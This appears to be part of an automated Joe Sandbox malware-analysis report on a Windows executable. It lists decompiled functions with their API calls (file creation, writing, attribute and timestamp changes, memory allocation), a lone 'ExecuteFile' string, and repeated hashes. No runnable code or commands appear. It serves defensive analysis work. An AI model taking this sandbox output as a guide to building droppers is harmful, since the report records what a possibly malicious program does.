                                                                            • Opcode Fuzzy Hash: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                            • Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002D,0000002D,?,00406616,?,00419810,00419810), ref: 00401739
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
                                                                              • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                              • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                              • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                              • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@FileTime$??3@AttributesSystemlstrlen
                                                                            • String ID: ExecuteFile
                                                                            • API String ID: 1306139538-323923146
                                                                            • Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                            • Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
                                                                            • Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                            • Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                            • memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memmove
                                                                            • String ID:
                                                                            • API String ID: 3828600508-0
                                                                            • Opcode ID: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                            • Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
                                                                            • Opcode Fuzzy Hash: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                            • Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID: @
                                                                            • API String ID: 1890195054-2766056989
                                                                            • Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                            • Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
                                                                            • Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                            • Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: lA
                                                                            • API String ID: 613200358-262130271
                                                                            • Opcode ID: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                            • Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
                                                                            • Opcode Fuzzy Hash: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                            • Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@H_prolog
                                                                            • String ID:
                                                                            • API String ID: 1329742358-0
                                                                            • Opcode ID: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                            • Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
                                                                            • Opcode Fuzzy Hash: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                            • Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@
                                                                            • String ID:
                                                                            • API String ID: 1936579350-0
                                                                            • Opcode ID: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                            • Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
                                                                            • Opcode Fuzzy Hash: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                            • Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@
                                                                            • String ID:
                                                                            • API String ID: 1936579350-0
                                                                            • Opcode ID: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                            • Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
                                                                            • Opcode Fuzzy Hash: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                            • Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                            • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                                            • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                            • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                            • Instruction ID: 6a7e44d1361fbcc4c06fb61f3001a61fff325a62d5d84498b6a11b5e2c7c739c
                                                                            • Opcode Fuzzy Hash: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                            • Instruction Fuzzy Hash: BBB0923280C260AEBA3A3E15F9038C967D5EF1023A321856FF089112656E972D92668C
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                            • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                                            • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                            • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                            • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                                            • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                            • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                            • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                                            • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                            • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                                            APIs
                                                                              • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle
                                                                            • String ID:
                                                                            • API String ID: 3498533004-0
                                                                            • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                            • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                                            • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                            • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                            • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                                            • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                            • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: _beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 3014514943-0
                                                                            • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                            • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                                            • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                            • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                            • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                                            • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                            • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                            • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
                                                                            • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                            • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                                            APIs
                                                                            • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FileTime
                                                                            • String ID:
                                                                            • API String ID: 1425588814-0
                                                                            • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                            • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                                            • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                            • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID:
                                                                            • API String ID: 1033339047-0
                                                                            • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                            • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                                            • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                            • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID:
                                                                            • API String ID: 1033339047-0
                                                                            • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                            • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
